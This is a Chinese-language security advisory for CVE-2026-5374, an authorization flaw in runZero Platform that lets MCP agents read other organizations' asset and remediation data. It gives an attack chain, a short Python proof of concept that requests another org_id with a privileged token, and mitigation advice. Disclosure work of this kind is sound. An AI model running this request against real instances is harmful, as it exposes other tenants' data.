IPBUF安全漏洞报告
English
CVE-2026-5374 CVSS 5.8 中危

CVE-2026-5374 runZero平台不正确的授权漏洞

披露日期: 2026-04-07
来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号
CVE-2026-5374
漏洞类型
权限绕过
CVSS评分
5.8 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
runZero Platform

相关标签

CWE-863权限绕过信息泄露runZeroMCP

漏洞概述

runZero Platform存在安全漏洞,允许MCP代理在未经授权的情况下访问其组织范围之外的修复和资产信息。该漏洞源于不正确的授权检查(CWE-863),攻击者需具备高权限并利用网络攻击向量。成功利用可能导致敏感信息泄露,CVSS v3.1评分为5.8(中危)。该问题已在runZero Platform 4.0.260202.0版本中修复。

技术细节

该漏洞的核心在于runZero平台对MCP(Model Context Protocol)代理的访问控制逻辑存在缺陷。系统在处理MCP代理发起的数据查询请求时,未能正确验证请求者是否有权访问特定组织范围内的资源。虽然CVSS向量要求高权限(PR:H),意味着攻击者通常需要拥有一个受损或合法的高权限账户,但一旦通过认证,系统未对请求目标资源的组织ID进行校验。由于存在范围改变(S:C),攻击者可以利用这一逻辑漏洞,通过修改API请求参数,跨越组织边界读取其他租户的资产清单及修复状态数据。这本质上属于水平越权漏洞,破坏了多租户环境下的数据隔离性。

攻击链分析

STEP 1
1. 权限获取
攻击者获取runZero平台的高权限账户凭证或劫持MCP代理会话。
STEP 2
2. 侦察探测
攻击者分析API接口,确定可以通过参数(如org_id或search query)指定查询范围的端点。
STEP 3
3. 越权请求
攻击者利用高权限Token,构造请求查询非授权组织范围内的资产或修复信息。
STEP 4
4. 数据泄露
服务器因未正确校验授权范围,返回了敏感数据,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "https://target-runzero-instance/api/v1.0/assets" # Auth token obtained from a high-privileged MCP agent session auth_token = "HIGH_PRIVILEGED_TOKEN_HERE" # Headers headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Payload: Attempt to access an asset ID belonging to a different organization # In a vulnerable version, the system might not validate the org_id context malicious_payload = { "search": "org_id:TARGET_EXTERNAL_ORG_ID" } try: # Sending the request response = requests.post(target_url, json=malicious_payload, headers=headers, verify=False) # Check if unauthorized data is returned if response.status_code == 200: print("[+] Exploit Successful! Leaked Asset Data:") print(response.json()) else: print("[-] Exploit Failed or Patched.") except Exception as e: print(f"Error: {e}")

影响范围

runZero Platform < 4.0.260202.0

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用MCP代理功能或严格限制其网络访问权限,并密切审计日志以检测是否存在跨组织的数据访问行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表